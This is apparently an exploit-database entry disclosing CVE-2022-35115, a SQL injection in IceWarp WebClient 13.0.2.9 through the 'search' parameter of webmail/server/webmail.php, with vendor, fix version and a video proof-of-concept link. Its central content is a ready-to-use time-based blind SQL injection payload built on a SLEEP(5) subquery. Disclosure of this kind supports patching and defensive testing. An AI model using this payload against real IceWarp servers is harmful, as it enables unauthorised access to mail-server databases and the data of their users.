CVE-2022-35115

[+] Title: IceWarp WebClient [+] Author: veyselxan [+] Vendor Homepage:https://www.icewarp.com/ [+] Tested on: Windows 10 [+] Versions: 13.0.2.9 [+] Fix version: DC2 - Update 2 Build 10 (13.0.2.10) [+] Vulnerability Type: SQL injection [+] Vulnerable Parameter: “search” [+] Vulnerable File: webmail/server/webmail.php [+] Cve:CVE-2022-35115 [+] Video POC: https://youtu.be/E04ZuqISASQ [+] Exploit: INJECTION_CODE_POC’) AND (SELECT 9056 FROM (SELECT(SLEEP(5)))Ouc0) AND ('bvsb’=bvsb [+] Payload: 240 IceWarp WebClient DC2 - Update 2 Build 9 (13.0.2.9) was discovered to contain a SQL injection vulnerability via the search parameter at /webmail/server/webmail.php.